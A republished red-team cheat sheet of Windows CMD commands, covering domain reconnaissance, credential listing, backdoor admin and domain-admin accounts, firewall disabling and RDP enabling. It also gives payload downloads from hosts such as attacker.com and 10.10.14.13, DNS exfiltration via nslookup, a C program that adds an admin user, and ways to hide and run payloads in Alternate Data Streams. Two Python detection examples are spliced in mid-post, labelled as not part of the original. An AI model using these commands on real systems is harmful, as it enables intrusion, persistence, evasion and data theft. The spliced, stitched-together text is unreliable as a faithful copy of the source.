Basic CMD Commands for Red Teams
2022-12-11 01:42:18 Author: Gcow安全团队 (Gcow Security Team)

Version and patch information

  wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #get the architecture
  systeminfo
  systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #only these fields
  wmic computersystem LIST full #computer information
  wmic qfe get Caption,Description,HotFixID,InstalledOn #installed patches
  wmic qfe list brief #updates
  hostname
  DRIVERQUERY #third-party vulnerable drivers?

Environment

  set #list all environment variables

Some environment variables worth highlighting:

  • COMPUTERNAME: computer name
  • TEMP/TMP: temporary folder
  • USERNAME: user name
  • HOMEPATH/USERPROFILE: home directory
  • windir: C:\Windows
  • OS: Windows OS
  • LOGONSERVER: name of the domain controller
  • USERDNSDOMAIN: domain name used with DNS
  • USERDOMAIN: name of the domain

  nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for the DC

Mounted disks

  (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
  wmic logicaldisk get caption,description,providername

Recycle Bin

  dir C:\$Recycle.Bin /s /b

Processes, services and software

  schtasks /query /fo LIST /v #verbose scheduled tasks
  schtasks /query /fo LIST 2>nul | findstr TaskName
  schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
  tasklist /V #process list
  tasklist /SVC #link processes to the services they started
  net start #started Windows services
  wmic service list brief #list services
  sc query #list of services
  dir /a "C:\Program Files" #installed software
  dir /a "C:\Program Files (x86)" #installed software
  reg query HKEY_LOCAL_MACHINE\SOFTWARE #installed software

Domain information

  # Common AD information
  echo %USERDOMAIN% #get the domain name
  echo %USERDNSDOMAIN% #get the domain name
  echo %logonserver% #get the name of the domain controller
  set logonserver #get the name of the domain controller
  set log #get the name of the domain controller
  gpresult /V #currently applied policy
  wmic ntdomain list /format:list #show information about the domain and the domain controllers
  # Users
  dsquery user #get all users
  net user /domain #list all users of the domain
  net user <ACCOUNT_NAME> /domain #get information about that user
  net accounts /domain #password and lockout policy
  wmic useraccount list /format:list #show information about all local and domain accounts that have logged on to the device
  wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #get all users
  wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET #get information about one user
  wmic sysaccount list /format:list #dump information about any system accounts being used as service accounts
  # Group information
  net group /domain #list of domain groups
  net localgroup administrators /domain #list the users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
  net group "Domain Admins" /domain #list the users with domain admin privileges
  net group "domain computers" /domain #list of PCs connected to the domain
  net group "Domain Controllers" /domain #list the PC accounts of the domain controllers
  wmic group list /format:list #information about all local groups
  wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #get all groups
  wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #members of the group
  wmic path win32_groupuser where (groupcomponent="win32_group.name=\"domain admins\",domain=\"DOMAIN_NAME\"") #members of the group
  # Computers
  dsquery computer #get all computers
  net view /domain #list of PCs of the domain
  nltest /dclist:<DOMAIN> #list the domain controllers
  wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #all computers
  wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #all computers
  # Trust relationships
  nltest /domain_trust #map the trust relationships
  # Get all objects inside an OU
  dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

Logs and events

  #Query the Security log using another credential
  wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

Users and groups

Users

  #Myself
  whoami /all #all information about me, check the enabled tokens
  whoami /priv #show only the privileges
  # Local users
  net users #all users
  dir /b /ad "C:\Users"
  net user %username% #information about the user (me)
  net accounts #information about the password requirements
  wmic USERACCOUNT Get Domain,Name,Sid
  net user /add [username] [password] #create a user
  # Find other users
  qwinsta #is anyone else logged in?
  #Launch a new cmd.exe with new credentials (to impersonate them on the network)
  runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
  #As an administrator, check the current logon sessions with logonsessions from Sysinternals
  logonsessions.exe
  logonsessions64.exe

Groups

  #Local
  net localgroup #all available groups
  net localgroup Administrators #information about the group (Administrators)
  net localgroup administrators [username] /add #add a user to Administrators
  #Domain
  net group /domain #domain group information
  net group /domain <domain_group_name> #users that belong to the group

List sessions

  qwinsta
  klist sessions

Password policy

  net accounts

Credentials

  cmdkey /list #list credentials
  vaultcmd /listcreds:"Windows Credentials" /all #look at Windows Credential Manager
  rundll32 keymgr.dll, KRShowKeyMgr #you need graphical access

Persistence with users

  # Add a domain user and put it in the Domain Admins group
  net user username password /ADD /DOMAIN
  net group "Domain Admins" username /ADD /DOMAIN
  # Add a local user and put it in the local Administrators group
  net user username password /ADD
  net localgroup Administrators username /ADD
  # Add a user to a group on the target
  net localgroup "Remote Desktop Users" UserLoginName /add
  net localgroup "Debugger users" UserLoginName /add
  net localgroup "Power users" UserLoginName /add

Network information

Interfaces, routes, ports, hosts and DNS cache

  ipconfig /all #show the detailed TCP/IP configuration of this host
  route print #show the routing table
  arp -a #show all entries in the ARP cache
  netstat -ano #open ports
  type C:\WINDOWS\System32\drivers\etc\hosts
  ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall

  netsh firewall show state #firewall information, open ports
  netsh advfirewall firewall show rule name=all
  netsh firewall show config #show the firewall configuration
  Netsh Advfirewall show allprofiles
  NetSh Advfirewall set allprofiles state off #turn off
  NetSh Advfirewall set allprofiles state on #turn on
  netsh firewall set opmode disable #turn off
  #How to open a port
  netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
  netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
  netsh firewall add portopening TCP 3389 "Remote Desktop"
  #Enable Remote Desktop
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  netsh firewall add portopening TCP 3389 "Remote Desktop"
  ::netsh firewall set service remotedesktop enable #I found this line is not needed
  ::sc config TermService start= auto #I found this line is not needed
  ::net start Termservice #I found this line is not needed
  #Enable Remote Desktop with wmic
  wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
  ##or
  wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
  #Enable Remote Assistance:
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
  netsh firewall set service remoteadmin enable
  #Ninja combo (new admin user, RDP + rassist + firewall allow)
  net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
  ::Connect to RDP (using hash or password)
  xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
  xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Shares

  net view #get a list of computers
  net view /all /domain [domainname] #shares on the domain
  net view \\computer /ALL #list the shares of a computer
  net use x: \\computer\share #mount the share locally
  net share #check the current shares

Wifi

  netsh wlan show profile #AP SSIDs
  netsh wlan show profile <SSID> key=clear #get the cleartext password

SNMP

  reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Network Interfaces

  ipconfig /all

ARP table

  arp -a

Download

Bitsadmin.exe

  bitsadmin /create 1
  bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
  bitsadmin /RESUME 1
  bitsadmin /complete 1

CertReq.exe

  CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe

  certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

Desktopimgdownldr.exe

  set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

  diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

Esentutl.exe

  esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand.exe

  expand \\webdav\folder\file.bat c:\ADS\file.bat

Extrac32.exe

  extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr.exe

  findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Ftp.exe

  cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

  C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

  HH.exe http://some.url/script.ps1

Ieexec.exe

  ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

  makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

MpCmdRun.exe

  MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

Replace.exe

  replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Excel.exe

  Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

  Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

  squirrel.exe --download [url to package]

Update.exe

  Update.exe --download [url to package]

Winword.exe

  winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

  wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Misc

  cd #show the current directory
  cd C:\path\to\dir #change directory
  dir #list the contents of the current directory
  dir /a:h C:\path\to\dir #list hidden files
  dir /s /b #recursive listing without the clutter
  time #get the current time
  date #get the current date
  shutdown /r /t 0 #reboot
  type <file> #print the file contents forward from the first byte
  #Runas
  runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #use saved credentials
  runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
  #Hide
  attrib +h file #set hidden
  attrib -h file #unset hidden
  #Give full control over a file that you own
  icacls <FILE_PATH> /t /grant <USERNAME>:F
  icacls <FILE_PATH> /remove <USERNAME> #remove the permissions
  #Recursive copy to SMB
  xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
  #Exe2bat converts an exe file into a bat file
  #ADS
  dir /r #Detect ADS
  more file.txt:ads.txt #read ADS
  powershell (Get-Content file.txt -Stream ads.txt)
  # Get the error message for an error code
  net helpmsg 32 #32 is the code in this case

Bypass Char Blacklisting

  echo %HOMEPATH:~6,-11%   #prints \ (substring of the variable's value)
  who^ami   #runs whoami (cmd.exe drops the lone caret)
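The defender's counterpart to the two tricks above, as an added example that is not part of the original post: before matching signatures, undo what cmd.exe itself undoes (a lone caret, a %VAR:~start,len% substring expansion), then match the command chains listed earlier on this page (admin user creation, firewall off, RDP enabled through the registry, certutil download). The sample command lines are constructed for this example; the rule set and names are assumptions, not a product's rule language.

```python
import re

# Constructed sample process-creation command lines (hypothetical
# Sysmon-style CommandLine values written for this example, not telemetry).
SAMPLE_CMDLINES = [
    'who^ami /priv',
    'echo %HOMEPATH:~6,-11%',
    'net user hacker Hacker123! /add & net localgroup administrators hacker /add',
    'netsh advfirewall set allprofiles state off',
    'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" '
    '/v fDenyTSConnections /t REG_DWORD /d 0 /f',
    'certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe',
    'dir /s /b',
]

CARET = re.compile(r'\w\^\w')                             # who^ami
VARSUBSTR = re.compile(r'%[A-Za-z_]+:~-?\d+(?:,-?\d+)?%')  # %HOMEPATH:~6,-11%

def normalize(cmdline):
    """Return what cmd.exe would actually execute, lower-cased.

    cmd.exe drops a lone caret (its escape character) and expands
    %VAR:~start,len% substrings, so a signature applied to the raw string
    misses who^ami and %HOMEPATH:~6,-11%. Carets are removed; substring
    expansions cannot be resolved offline and are replaced by a marker."""
    s = cmdline.replace('^', '')
    return VARSUBSTR.sub('<varsubstr>', s).lower()

# Signatures for command chains listed on this page, matched against the
# normalized command line. A fixed order keeps results deterministic.
RULES = [
    ('local-admin-user-created',
     re.compile(r'net user \S+ \S+ /add.*net localgroup administrators \S+ /add')),
    ('host-firewall-disabled',
     re.compile(r'netsh advfirewall set allprofiles state off'
                r'|netsh firewall set opmode disable')),
    ('rdp-enabled-via-registry', re.compile(r'fdenytsconnections .*/d 0')),
    ('certutil-urlcache-download', re.compile(r'certutil(\.exe)? .*-urlcache .*-f ')),
]

def classify(cmdline):
    """Return the names of the rules that fire for one command line."""
    hits = []
    if CARET.search(cmdline):
        hits.append('caret-obfuscation')
    if VARSUBSTR.search(cmdline):
        hits.append('env-substring-obfuscation')
    norm = normalize(cmdline)
    hits.extend(name for name, rx in RULES if rx.search(norm))
    return hits

def scan(cmdlines):
    """Map each command line that triggered a rule to the rule names."""
    return {c: classify(c) for c in cmdlines if classify(c)}
```

`scan(SAMPLE_CMDLINES)` flags six of the seven constructed lines; a caret-split `net^sh ... state off` is reported both as obfuscated and as a firewall change because matching runs on the normalized form.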

DOSfuscation

Generate an obfuscated CMD command line

  git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
  cd Invoke-DOSfuscation
  Import-Module .\Invoke-DOSfuscation.psd1
  Invoke-DOSfuscation
  help
  SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
  encoding

Listen address ACLs

You can listen on http://+:80/Temporary_listen_Addresses/ without being an administrator.

  netsh http show urlacl

Manual DNS shell

The attacker (Kali) must use one of the following two options:

  sudo responder -I <iface> #Active
  sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

Victim

The for /f token technique: it lets us run a command, take the first X words of each output line, and send them to the server through DNS.

  for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
  for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
  for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
  for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
  for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
  #More complex commands
  for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Send up to 9 tokens per line

You can also redirect the output to a file and then read it back.

  whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
  for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
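The defender's view of the same channel, as an added example that is not part of the original post: because nslookup <name> <IP_kali> goes straight to that IP on UDP/53, the detection signal is a client talking DNS to a host that is not a sanctioned resolver, and once such a capture is in hand the %a.%b.%c labels can be read back into the command output that left the host. The tcpdump-style lines, the addresses and the approved-resolver set are all constructed assumptions for this example.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style DNS query lines, made up for this example:
# 10.0.0.2 plays the sanctioned corporate resolver, 10.0.0.9 the
# attacker's listener and 10.0.0.5 the victim.
SAMPLE_CAPTURE = """\
01:42:18.100 IP 10.0.0.5.51001 > 10.0.0.2.53: 1001+ A? intranet.corp.local. (37)
01:42:19.000 IP 10.0.0.5.51002 > 10.0.0.9.53: 1002+ A? SeDebugPrivilege.Debug.programs.Enabled. (57)
01:42:19.050 IP 10.0.0.5.51003 > 10.0.0.9.53: 1003+ A? SeImpersonatePrivilege.Impersonate.a.client. (61)
01:42:19.100 IP 10.0.0.5.51004 > 10.0.0.9.53: 1004+ A? Program.Files. (32)
01:42:19.150 IP 10.0.0.5.51005 > 10.0.0.9.53: 1005+ A? Users. (25)
01:42:20.000 IP 10.0.0.7.51006 > 10.0.0.2.53: 1006+ A? mail.corp.local. (33)
"""

LINE = re.compile(
    r'^(?P<ts>\S+) IP (?P<src>\d+(?:\.\d+){3})\.\d+ > (?P<dst>\d+(?:\.\d+){3})\.53: '
    r'\d+\+? A\? (?P<qname>\S+)\. \(\d+\)$')

APPROVED_RESOLVERS = {'10.0.0.2'}   # assumption: the only sanctioned DNS servers

def parse(capture):
    """Return (timestamp, src, dst, qname) for every DNS query line."""
    return [(m['ts'], m['src'], m['dst'], m['qname'])
            for m in map(LINE.match, capture.splitlines()) if m]

def rogue_resolver_queries(records):
    """Group queries that bypass the sanctioned resolvers by (src, dst).

    The query goes directly to the attacker's IP on UDP/53, so the
    corporate resolver never sees it; egress DNS to an unapproved host
    is the signal, independent of what the labels contain.
    """
    groups = defaultdict(list)
    for _ts, src, dst, qname in records:
        if dst not in APPROVED_RESOLVERS:
            groups[(src, dst)].append(qname)
    return dict(groups)

def reconstruct(qnames):
    """Rebuild the command-output lines from the %a.%b.%c labels.

    Each label is one for /f token; empty labels (tokens beyond the
    line's word count) are dropped, so incident response can read back
    exactly which lines left the host.
    """
    return [' '.join(label for label in q.split('.') if label) for q in qnames]
```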

Calling CMD from C code

  #include <stdlib.h>     /* system, NULL, EXIT_FAILURE */
  // When executed by Administrator this program will create a user and then add him to the administrators group
  // i686-w64-mingw32-gcc addmin.c -o addmin.exe
  // upx -9 addmin.exe
  int main(void) {
      int i;
      i = system("net users otherAcc 0TherAcc! /add");             // create the account
      i = system("net localgroup administrators otherAcc /add");   // add it to the local Administrators group
      (void)i;                                                     // return codes are not checked here
      return 0;
  }

Alternate Data Streams cheat sheet (ADS)

Taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

  ##Add content to ADS###
  type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
  extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
  findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
  certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
  makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
  print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
  reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
  regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
  expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
  esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
  powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
  curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
  cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
  Set-Content -Path {path to the file} -Stream {name of the stream}
  ## Discover ADS content
  dir /R
  streams.exe <c:\path\to\file> #Binary from sysinternals#
  Get-Item -Path .\file.txt -Stream *
  gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
  ##Extract content from ADS###
  expand c:\ads\file.txt:test.exe c:\temp\evil.exe
  esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
  more < c:\ads\file.txt:test.exe
  ##Executing the ADS content###
  * WMIC
  wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
  * Rundll32
  rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
  rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
  rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
  * Cscript
  cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
  * Wscript
  wscript c:\ads\file.txt:script.vbs
  echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
  * Forfiles
  forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
  * Mavinject.exe
  c:\windows\SysWOW64\notepad.exe
  tasklist | findstr notepad
  notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
  type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
  c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
  * MSHTA
  mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
  (Does not work on Windows 10 1903 and newer)
  * Control.exe
  control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
  https://twitter.com/bohops/status/954466315913310209
  * Create service and run
  sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
  sc start evilservice
  https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  * Powershell.exe
  powershell -ep bypass - < c:\temp:ttt
  * Powershell.exe
  powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
  * Powershell.exe
  Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = 'C:\ads\folder:file.exe'}
  * Regedit.exe
  regedit c:\ads\file.txt:regfile.reg
  * Bitsadmin.exe
  bitsadmin /create myfile
  bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
  bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
  bitsadmin /RESUME myfile
  * AppVLP.exe
  AppVLP.exe c:\windows\tracing\test.txt:ha.exe
  * Cmd.exe
  cmd.exe - < fakefile.doc:reg32.bat
  https://twitter.com/yeyint_mth/status/1143824979139579904
  * Ftp.exe
  ftp -s:fakefile.txt:aaaa.txt
  https://github.com/sailay1996/misc-bin/blob/master/ads.md
  * ieframe.dll , shdocvw.dll (ads)
  echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt
  rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
  rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
  https://github.com/sailay1996/misc-bin/blob/master/ads.md
  * bash.exe
  echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
  bash.exe -c $(fakefile.txt:payload.sh)
  https://github.com/sailay1996/misc-bin/blob/master/ads.md
  * Regsvr32
  type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
  regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS

A recommended practice range: https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU It offers complete environments from web, through the internal network, to the domain, and the challenges are well designed; anyone interested can go and try it.


Source: http://mp.weixin.qq.com/s?__biz=MzUyNzk2NDcwMw==&mid=2247488101&idx=4&sn=115fc27bb81740323f239c75e9c5d23d&chksm=fa76dd15cd015403a4a794f068b1dd372a6612d93d1892a2ab4654074cb669265941c0385389#rd